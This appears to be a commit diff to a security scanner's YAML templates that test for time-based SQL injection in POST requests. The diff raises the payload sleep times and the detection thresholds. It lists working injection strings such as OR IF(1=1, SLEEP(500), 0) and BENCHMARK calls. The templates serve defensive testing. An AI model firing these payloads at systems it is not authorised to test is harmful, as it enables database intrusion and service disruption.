Skip to content

Commit 7729533

Browse files
committed
fixed
1 parent 2f12557 commit 7729533

File tree

2 files changed

+5
-5
lines changed

2 files changed

+5
-5
lines changed

Broken-User-Authentication/TimeBasedMySQLiPOST.yml

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -76,10 +76,10 @@ api_selection_filters:
7676
extract: userVal
7777
wordLists:
7878
timeBasedPayloads:
79-
- "' OR IF(1=1, SLEEP(5), 0) -- -"
79+
- "' OR IF(1=1, SLEEP(500), 0) -- -"
8080
- "' OR IF(1=1, BENCHMARK(10000000, SHA1('test')), 0) -- -"
81-
- "' OR IF((SELECT COUNT(*) FROM users) > 10, SLEEP(5), 0) -- -"
82-
- "' OR (SELECT IF(1=1, SLEEP(5), 0)) -- -"
81+
- "' OR IF((SELECT COUNT(*) FROM users) > 10, SLEEP(500), 0) -- -"
82+
- "' OR (SELECT IF(1=1, SLEEP(500), 0)) -- -"
8383
execute:
8484
type: multiple
8585
requests:
@@ -136,7 +136,7 @@ validate:
136136
and:
137137
- compare_greater:
138138
- ${x2.response.stats.median_response_time}
139-
- 5001
139+
- 15001
140140
- compare_greater:
141141
- ${x2.response.stats.median_response_time}
142142
- ${x1.response.stats.median_response_time} * 5

Broken-User-Authentication/TimeBasedSQLiSQLiteDBPOST.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -137,7 +137,7 @@ validate:
137137
and:
138138
- compare_greater:
139139
- ${x2.response.stats.median_response_time}
140-
- 5001
140+
- 15001
141141
- compare_greater:
142142
- ${x2.response.stats.median_response_time}
143143
- ${x1.response.stats.median_response_time} * 5

0 commit comments

Comments
 (0)